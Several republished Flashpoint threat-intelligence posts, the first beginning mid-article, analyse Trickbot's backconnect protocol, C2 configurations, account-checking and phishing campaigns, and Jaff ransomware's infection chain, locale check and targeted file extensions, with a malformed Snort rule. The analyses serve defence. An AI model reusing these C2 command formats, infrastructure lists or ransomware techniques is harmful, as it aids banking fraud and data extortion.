Trickbot utilizes a backconnect communication protocol maintaining the following commands, which are used for client-server communications initially with the command prefix “c”:

● disconnect: Terminate the backconnect server connection
● idle: Maintain the client-server connection
● connect: connect to the backconnect server. The command must consist of the following parameters:

○ ip: Backconnect server’s IP address
○ auth_swith: Use authorization flag. If the value is set to “1”, the Trojan receives the auth_login and auth_pass parameters. If the value is “0”, the Trojan gets the auth_ip parameter. Otherwise, the connection will not be established.
○ auth_ip: Authentication IP address
○ auth_login: Authentication login
○ auth_pass: Authentication password

Image 3: A Trickbot victim connects to the Trickbot backconnect server.

There are three main Trickbot SOCKS5 server-client commands:

● c=idle
● c=disconnect
● c=connect

Trickbot victims create a sequence of GET requests to the server on gate[.]php:

● client_id=&connected=&server_port=&debug=

The server responds with a POST request with the following parameters if the connection needs to be established:

● c=connect&ip=&auth_swith=&auth_ip=&auth_login=&auth_pass=

If the connection needs to be terminated, the server will respond with c=disconnect.

Image 4: The Trickbot machine actively pings the server every 100 seconds.

Most notably, once compromised, Trickbot targets customers of financial institutions via webinjects and redirection attacks. The Trojan also uses victim IPs as proxies to leverage username and password combinations for account checking activity. The observed account checking activity mainly targets customers of companies in nine industries, most of those in gaming. Notably, some of the targets appear to be Russia-based companies.

Image 5: Trickbot account checking activities mainly target customers in nine industries.

Trickbot account checking activity is mainly directed to customers of U.S.- and Russia-based companies operating in the following industries:

● Gaming
● Technology
● Financial
● Entertainment
● Adult
● Social Media
● Retail
● Rewards
● Cryptocurrency

Likely leveraging commercial account checker tools, the Trickbot gang and its associates heavily utilize its victims’ IPs as proxies for account checking activity that imitates mobile device-based account logins. Their attacks leave various web applications artifacts such as spoofed user agent information and device information, indicating as if the activity was being performed leveraging mobile devices. Such mobile logins are meant to bypass traditional anti-fraud controls that are largely implemented to address web-based logins. In cybercriminals’ pursuit of targets, their attempts at evading anti-fraud systems are thus dictated by a company’s anti-fraud controls, which are in turn influenced by cybercriminal tactics, techniques, and procedures (TTPs). Analysts assess with moderate confidence the Trickbot operators will likely continue to monetize infections by turning victims’ IPs into proxies that subsequently fuel account checking activities.

The post Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model appeared first on Flashpoint.

Go to Source
Author: Flashpoint

BEC Campaigns Target Organizations Across Sectors Using Credential Phishing

In general, business email compromise (BEC) scams are widely viewed as a type of cybercrime that necessitates relatively minimal technical ability. Despite this, analysts industry-wide have observed BEC operators progressing from simple schemes such as 419 and fake lottery scams – in which unwitting victims are duped into sending payments to fraudsters after being promised large sums – towards experimenting with malware and creating sophisticated networks in order to quickly and reliably move money from one account to another.

Through source intelligence, Flashpoint identified a recent credential phishing campaign that had a low detection rate due to its simplicity; the campaign relied on malicious PDF files containing embedded links that redirected potential victims to credential-harvesting phishing sites.

Threat actors sent seventy-three malicious PDFs in credential phishing campaigns between March 28, 2017 and August 8, 2017. These malicious PDFs targeted a range of verticals, including universities, software and technology companies, retailers, engineering organizations, real estate firms, and churches, with the goal of harvesting user credentials.

Of the seventy-three files identified, analysts were able to identify seventy unique Uniform Resource Identifiers (URIs); many of these overlapped based on domains. Attackers used twenty-nine different domains across these documents.

Image 1: A sample of the domains utilized by the actors across campaigns.

Image 1: A sample of the domains utilized by the actors across campaigns.

A potential victim of this phishing campaign would receive a malicious PDF containing a malicious link. Upon opening the PDF, the potential victim would be presented with a prompt to view a secure online document; when clicked, this prompt would redirect the victim to a phishing website to input their login credentials.

Image 2: Upon opening the malicious PDF, a potential victim sees a prompt to access a secure online document, which directs them to a phishing page.

Image 2: Upon opening the malicious PDF, a potential victim sees a prompt to access a secure online document, which directs them to a phishing page.

Once on the phishing page, the potential victim is presented with several options to “download” the file and is asked for login credentials for their organization. Once a victim enters their login credentials, the script redirects the victim to a document or web page owned by the targeted organization.

Image 3: A view of the phishing webpage for harvesting credentials.

Image 3: A view of the phishing webpage for harvesting credentials.

If valid credentials were submitted, the actors behind the phishing campaign would harvest them. Once harvested, the threat actors would then use the compromised accounts to send phishing emails to victims’ contacts; the emails may have been viewed as “trusted” by email services given that they were coming from legitimate email accounts. This practice helps threat actors committing Business Email Compromise (BEC) gain a better foothold into target organizations, and allows them to potentially breach additional organizations. Actors can also use the credentials from compromised accounts to monitor inboxes for additional incoming and outgoing information.

Assessment

Flashpoint analysts assess that these attacks are likely being carried out by attackers located in Western Africa due to the originating IP addresses of the phishing emails, as well as the actors’ tactics, techniques, and procedures (TTPs), such as the focus on credential phishing, the absence of malware, and a lack of operations security (OPSEC) practices on the attackers’ part.

Based on artifacts left in the PDFs, these documents likely represent a small glimpse into the credential phishing community of West African cybercriminals.

Image 4: A phishing email sent from a cloud-provided email service provider has a Nigerian IP address as the originating IP.

Image 4: A phishing email sent from a cloud-provided email service provider has a Nigerian IP address as the originating IP.

While BEC actors operating out of western Africa are broadly considered among the lowest-skilled cyber threat actors, they have been responsible for more than $5 billion USD in fraud in the last three years. In comparison, ransomware was projected to be a $1 billion USD industry in 2016, and Europol estimated that the now-defunct AlphaBay Market was responsible for almost $1 billion USD in business between its creation in 2014 and its closure in July 2017.

BEC actors and cybercriminals located in West Africa typically do not make significant efforts to enhance their OPSEC practices or conceal their locations; however, they are still largely successful in stealing billions of dollars from publicly traded and high-profile organizations each year.

The post BEC Campaigns Target Organizations Across Sectors Using Credential Phishing appeared first on Flashpoint.

Go to Source
Author: Chelsea Sawicki

With a boost from Necurs, Trickbot expands its targeting to numerous U.S. financial institutions

The Necurs botnet first emerged in 2012 and has since become notorious for powering massive, malware-laden spam campaigns. Although the botnet’s historical association with Locky and Jaff Ransomware has long raised concerns from organizations across all sectors, Necurs is now delivering a different type of malware that poses a threat specifically to the financial sector: the Trickbot banking Trojan.

Trickbot has been responsible for man-in-the-browser (MitB) attacks since mid-2016, yet the malware’s webinject configuration has only targeted financial institutions located outside of the U.S. — up until now. Starting on July 17, 2017, Flashpoint observed a new, Necurs-powered Trickbot spam campaign containing an expanded webinject configuration developed to target and infect customers of international and U.S.-based financial institutions. The latest Trickbot campaign, known as “mac1,” targets customers of various institutions in the U.S., U.K., New Zealand, France, Australia, Norway, Swedish, Iceland, Finland, Canada, Italy, Spain, Switzerland, Luxembourg, Belgium, Singapore, and Denmark.

Thus far, mac1 has fueled at least three different spam waves — all of which have included the Trickbot loader as a final payload. The initial spam wave contained an HTML email masquerading as a bill from an Australian telecommunications company. These malicious emails contained a Zip-archived Windows Script File (WSF) attachment consisting of obfuscated JavaScript code. Upon being clicked, the files download and execute the Trickbot loader. Although this wave utilized malicious WSF scripts as the initial vector of infection, subsequent campaigns have evolved and appear to instead utilize malicious macro-laden documents as their attachments.

Image 1: Trickbot mac1 lure email masquerading as a telecommunications billing notice.

Image 1: Trickbot mac1 lure email masquerading as a telecommunications billing notice.

Trickbot Analysis

Upon infecting a machine, Trickbot initially creates a process using the “CREATE_SUSPENDED” flag before injecting its module and terminating the initial thread used to launch the Trojan.

Next, Trickbot creates a folder in %APPDATA%, copies itself there, adds an authroot certificate file in %TEMP%, and adds as a service update[.]job for persistence in the Windows Task folder. Trickbot then stores an encoded configuration module in the “resource” section of its binary and retrieves additional modules from its controller domains when needed.

Image 2: The Trickbot mac1 main configuration includes various IP domains on port 443.

Image 2: The Trickbot mac1 main configuration includes various IP domains on port 443.

Trickbot’s mac1 main configuration is as follows:

1000027
mac1
194.87.95[.]60:443
190.228[.]169.106:443
94.42.91[.]27:443
118.91.178[.]114:443
186.103.161[.]204:443
163.53.206[.]187:443
46.160.165[.]16:443
191.7.30[.]30:443
46.160.165[.]31:443
197.248.210[.]150:443
195.133.201[.]149:443
94.140.121[.]250:443
83.234.136[.]55:443
93.99.68[.]140:443
118.91.178[.]145:443
168.194.82[.]174:443
190.34.158[.]250:443

The certificate is set with the expiration date as follows:

<./ssert>

The Trickbot’s server configuration is as follows:

195.69.196[.]77:447
91.206.4[.]216:447
189.84.113[.]83:447
118.91.178[.]98:447
195.2.253[.]95:447
195.133.49[.]207:447
194.87.235[.]155:447

Trickbot’s module configuration is as follows:

yesyes

197.248.210[.]150:443
195.133.201[.]149:443
94.140.121[.]250:443
83.234.136[.]55:443
93.99.68[.]140:443
118.91.178[.]145:443
168.194.82[.]174:443
190.34.158[.]250:443

Trickbot also contains importDll32, mailsearcher32, systeminfo32, injectDll32, and outlookDl32 modules.

Image 3: Trickbot’s various modules include “mailsearcher32”.

Image 3: Trickbot’s various modules include “mailsearcher32”.

Flashpoint observed Trickbot’s mac1 static (“sinj”) and dynamic (“dinj”) webinject modules targeting customers of U.S. and international financial institutions in the following three formats:

*/error_path/404[.]html*

<sinj

*

*.gif*
*.jpg*
*.png*
*.js*
*.css*
*text/html*

Furthermore, Flashpoint’s malware analysis revealed significant similarities between the Trickbot banking Trojan and the Dyre banking Trojan. Indeed, Trickbot is considered to be Dyre’s successor. As such, it’s possible that Trickbot’s author may have either had deep knowledge of Dyre or simply re-used old source code. The Dyre cybercriminal syndicate has historically targeted various Western financial institutions including those located in the U.S., U.K., and Canada. Following a takedown by Russian law enforcement, the Dyre banking Trojan gang ceased operations in 2015; their old aliases have since disappeared from the underground.

Conclusion

Since the Trickbot banking Trojan’s mac1 campaign remains fueled by the powerful Necurs botnet, it will likely continue to evolve and target customers of U.S. and international financial institutions. Anti-fraud programs are an important part of many FI programs to detect and counter this threat to their customer base. As threats posed by malware such as Trickbot continue to emerge and their targets expand, it is crucial for all organizations and its users to be extra vigilant in their security practices.

The Trickbot mac1 Indicators of Compromise (IOCs) are available for download here.

The post With a boost from Necurs, Trickbot expands its targeting to numerous U.S. financial institutions appeared first on Flashpoint.

Go to Source
Author: Chelsea Sawicki

“Necurs” Botnet Fuels Massive Spam Campaigns Spreading “Jaff” Ransomware

Starting on May 11, 2017, Flashpoint analysts observed several large spam campaigns originating from the Necurs botnet that aim to dupe recipients into opening malicious attachments that infect their computers with “Jaff” ransomware. These spam campaigns feature a multi-stage infection chain including a PDF file, a malicious Microsoft Office document, and finally, the Jaff ransomware loader. This same infection chain has been utilized in the past to infect computers with the Dridex banking Trojan and Jaff’s predecessor, Locky ransomware.

Image 1: The Necurs-Jaff delivery chain reveals heavy usage of PDF attachments.

Image 1: The Necurs-Jaff delivery chain reveals heavy usage of PDF attachments.

The Necurs botnet is comprised of smaller “sub-botnets” distinguishable by the seed value used in the malware’s code for domain generation algorithm (DGA). Although these sub-botnets send different kinds of spam when compared to one another, they all share the same command-and-control (C2) infrastructure. Flashpoint has thus far observed Jaff ransomware emanate from the spam module with a DGA seed of nine.

Prior to a spam run, the node infected with the Necurs malware will first perform a series of checks to ensure it is capable of sending spam. The infected node first receives an updated list of C2 IP addresses for the spam module before it verifies Internet connectivity by downloading Service Pack 1 for Windows 7. Once these checks pass, the bot will do a final connectivity check for Simple Mail Transfer Protocol (SMTP; TCP Port 25) as depicted in the following packet capture:

Image 2: Packet capture of connectivity checks and spam from a Necurs bot.

Image 2: Packet capture of connectivity checks and spam from a Necurs bot.

Image 3: Malspam with fake headers sent from the Necurs botnet contains a malicious PDF attachment.

Image 3: Malspam with fake headers sent from the Necurs botnet contains a malicious PDF attachment.

Ransomware Analysis

The spam attachments are PDF files containing JavaScript code that automatically executes upon opening the file via the “OpenAction” function. This JavaScript code extracts an embedded, malicious Office document from an object section of the PDF file.

Image 4: Victims may be prompted to open a malicious Office document when viewing the PDF spam attachment.

Image 4: Victims may be prompted to open a malicious Office document when viewing the PDF spam attachment.

Image 5: The encoded Office document in one of the PDF sections.

Image 5: The encoded Office document in one of the PDF sections.

The next item in the infection chain is the malicious Microsoft Office Document that is opened via JavaScript code from the PDF file. This Word document contains macros that download an encrypted binary from one of four URLs, decrypts it with a hardcoded XOR key, then executes the binary – the Jaff ransomware loader.

Image 6: The Word document that is opened by the PDF file.

Image 6: The Word document that is opened by the PDF file.

Image 7: The hardcoded XOR key used to decode the ransomware loader executable.

Image 7: The hardcoded XOR key used to decode the ransomware loader executable.

The Jaff ransomware is a 32-bit Windows executable, containing the malicious obfuscated code. Jaff explicitly targets Windows systems, enumerating the targets’ local file system by searching for specific file extensions to encrypt. Files that have been encrypted are renamed appending the extension .wlu or .jaff. Such extensions are typical for this ransomware. The victim obtains a unique Jaff ID on the Tor website.

The Jaff ransomware sets encryption messages localized to the language detected in the system. Just like its previous variant Locky, this ransomware renders and saves bitmap files in each directory with the encrypted files. The bitmap file is used as a wallpaper displaying the ransom message.

Images 8-10: The Jaff ransomware attack reveals encryption and its personalized HTML and Bitmap files after the infection.

Images 8-10: The Jaff ransomware attack reveals encryption and its personalized HTML and Bitmap files after the infection.

Jaff enumerates through the GetDrive API from letters A to Z for various types of local drives such as fixed, storage, and removable.

Jaff ransomware is designed to encrypt files even if the C2 check in fails. However, based on the most current assessment, Jaff ransomware sends a GET request to the Jaff domain ending in /a5 leading to the possible Snort signature:

alert any $HOME_NET any -> any any (msg:” possible Jaff C2 check-in alert”; content: flow:to_server,established; content:”GET”; “/a5/”; nocase; http_method; “pcre: “*(/a5/)$”; classtype: Trojan-activity)

Image 11: The Jaff ransomware enumerates drives from A to Z before launching its encryption threads.

Image 11: The Jaff ransomware enumerates drives from A to Z before launching its encryption threads.

Based on analysis of the ransomware code, it is apparent Jaff uses both RSA and AES encryption algorithms using Windows Crypto API. The ransomware encrypts files by appending approximately 100 bytes to each file using a WriteFile Windows API call to each file fitting the target extension.

Image 12: Jaff sets the nBytestoWrite argument via appending the encryption blog to each file.

Image 12: Jaff sets the nBytestoWrite argument via appending the encryption blog to each file.

The Jaff ransomware is designed not to run under certain conditions. This mechanism can be imitated, leading to the creation of a mitigation strategy that can be used on machines before infection.

Image 13: Jaff checks for the presence of Russian-language locale on each machine.

Image 13: Jaff checks for the presence of Russian-language locale on each machine.

The API calls GetSystemDefaultLangID and GetUserDefaultLangID return 0x0409 in the EXTENDED ACUMULATOR REGISTER (EAX) on any US English-language machines. In this sense, 0x0409 is the locale culture identifier (LCID) for the English (United States) locale. However, the Jaff ransomware loads the return value into AX and compares it to the hardcoded value “19,” which is the AX identifier for the same calls if the language was set to Russian.

Below is the relevant disassembled routine that is used to check if the ransomware targets Russian-language machines:

call GetUserDefaultLangID
mov edx, 3ff
and ax, dx
cmp ax, 19
je .TerminateRansomwareProcess
call GetSystemDefaultLangID
mov edx, 3ff
and ax, dx
cmp ax, 19
je .TerminateRansomwareProcess

Image 14: The Jaff ransomware checks for the hardcoded value 19 that corresponds to the last two characters of the Russian-language LCID.

Image 14: The Jaff ransomware checks for the hardcoded value 19 that corresponds to the last two characters of the Russian-language LCID.

Image 15: The Jaff ransomware targets various file extensions and deletes itself via a cmd[.]exe command.

Image 15: The Jaff ransomware targets various file extensions and deletes itself via a cmd[.]exe command.

Additionally, when successfully launched, the Jaff ransomware uses a simple self-kill routine by executing the command “del /Q /F ” via cmd[.]exe /c in order to delete the original ransomware executable from the victim machine.

The following file extensions are attacked by the Jaff ransomware:

.xlsx .acd .pdf .pfx .crt .der .cad .dwg .MPEG .rar .veg .zip .txt .jpg .doc .wbk .mdb .vcf .docx .ics .vsc .mdf .dsr .mdi .msg .xls .ppt .pps .obd .mpd .dot .xlt .pot .obt .htm .html .mix .pub .vsd .png .ico .rtf .odt .3dm .3ds .dxf .max .obj 7z .cbr .deb .gz .rpm .sitx .tar .tar .gz .zipx .aif .iff .m3u .m4a .mid .key .vib .stl .psd .ova .xmod .wda .prn .zpf .swm .xml .xlsm .par .tib .waw .001 .002 .003 . .004 .005 .006 .007 .008 .009 .010 .contact .dbx .jnt .mapimail .oab .ods .ppsm .pptm .prf .pst .wab .1cd .3g2 .7ZIP .accdb .aoi .asf .asp .aspx .asx .avi .bak .cer .cfg .class .config .css .csv .db .dds .fif .flv .idx .js .kwm .laccdb .idf .lit .mbx .md .mlb .mov .mp3 .mp4 .mpg .pages .php .pwm .rm .safe .sav .save .sql .srt .swf .thm .vob .wav .wma .wmv .xlsb .aac .ai .arw .c .cdr .cls .cpi .cpp .cs .db3 .docm .dotm .dotx .drw .dxb .eps .fla .flac .fxg .java .m .m4v .pcd .pct .pl .potm .potx .ppam .ppsx .ps .pspimage .r3d .rw2 .sldm .sldx .svg .tga .wps .xla .xlam .xlm .xltm .xltx .xlw .act .adp .al .bkp .blend .cdf .cdx .cgm .cr2 .dac .dbf .dcr .ddd .design .dtd .fdb .fff .fpx .h .iif .indd .jpeg .mos .nd .nsd .nsf .nsg .nsh .odc .odp .oil .pas .pat .pef .ptx .qbb .qbm .sas7bdat .say .st4 .st6 .stc .sxc .sxw .tlg .wad .xlk .aiff .bin .bmp .cmt .dat .dit .edb .flvv .gif .groups .hdd .hpp .log .m2ts .m4p .mkv .ndf .nvram .ogg .ost .pab .pdb .pif .qed .qcow .qcow2 .rvt .st7 .stm .vbox .vdi .vhd .vhdx .vmdk .vmsd .vmx .vmxf .3fr .3pr .ab4 .accde .accdt .ach .acr .adb .srw .st5 .st8 .std .sti .stw .stx .sxd .sxg .sxi .sxm .tex .wallet .wb2 .wpd .x11 .x3f .xis .ycbcra .qbw .qbx .qby .raf .rat .raw .rdb .rwl .rwz .s3db .sd0 .sda .sdf .sqlite .sqlite3 .sqlitedb .sr .srf .oth .otp .ots .ott .p12 .p7b .p7c .pdd .pem .plus_muhd .plc .pptx .psafe3 .py .qba .qbr .myd .ndd .nef .nk .nop .nrw .ns2 .ns3 .ns4 .nwb .nx2 .nxl .nyf .odb .odf .odg .odm .ord .otg .ibz .iiq .incpas .jpe .kc2 .kdbx .kdc .kpdx .lua .mdc .mef .mfw .mmw .mny .moneywell .mrw .des .dgc .djvu .dng .drf .dxg .eml .erbsql .erd .exf .ffd .fh .fhd .gray .grey .gry .hbk .ibank .ibd .cdr4 .cdr5 .cdr6 .cdrw .ce1 .ce2 .cib .craw .crw .csh .csl .db_journal .dc2 .dcs .ddoc .ddrw .ads .agdl .ait .apj .asm .awg .back .backup .backupdb .bank .bay .bdb .bgt .bik .bpw .cdr3 .as4 .tif .asp .hdr .iso.

Images 16-17: Jaff ransomware victim payment page and admin panel on the Tor hidden website.

Images 16-17: Jaff ransomware victim payment page and admin panel on the Tor hidden website.

Assessment

Flashpoint analysts continue to monitor the cybercriminal syndicate behind Jaff ransomware. These actors utilize the Necurs rootkit infections as a spam bot to deliver email spam with malicious attachments. Flashpoint assesses with moderate confidence that the threat actors who once favored Locky have now likely switched to using Jaff ransomware.

This Jaff syndicate remains one of the most active cybercriminal groups within the cybercrime landscape. Virtually every Russian-language cybercrime gang has an informal rule prohibiting the discussion of criminal activity directed against Russian nationals and other residents of the Commonwealth of Independent States (CIS) in order to avoid being targeted by Russian law enforcement. With the influx of press releases from Russian law enforcement about the arrest of major cybercrime gangs, security concerns remain a constant variable in the calculation of risk on the part of Russian-speaking cybercriminals. The Jaff actors also continue to avoid targeting any Russian-language victims via specific Windows API queries. This further supports the hypothesis that cybercriminals utilizing Jaff likely operate in a Russian-speaking country.

Mitigation

One possible Jaff ransomware mitigation strategy involves changing the machine’s language to Russian. One of the steps the ransomware takes is checking the language on the machine via the GetSystemDefaultLangID and GetUserDefaultLangID API. If Jaff detects that the language on the machine is set to Russian, it automatically terminates itself.

Organizations should continue to proactively collect indicators of compromise (IOCs) relevant to ongoing ransomware campaigns, as some variants, such as Jaff, continue to progress dynamically by leveraging discovered IOCs for counter-defensive procedures. As ransomware threats continue to evolve, it is crucial to develop and maintain good security hygiene, including robust patch and vulnerability management, data encryption, data backups, and vigorous user-access management controls.

Attachments & Downloads

To download the Jaff Ransomware indicators of compromise (IOCs), please click here.

Sources

https://www.flashpoint-intel.com/blog/necurs-dating-scam 
https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet

The post “Necurs” Botnet Fuels Massive Spam Campaigns Spreading “Jaff” Ransomware appeared first on Flashpoint.

Go to Source
Author: Chelsea Sawicki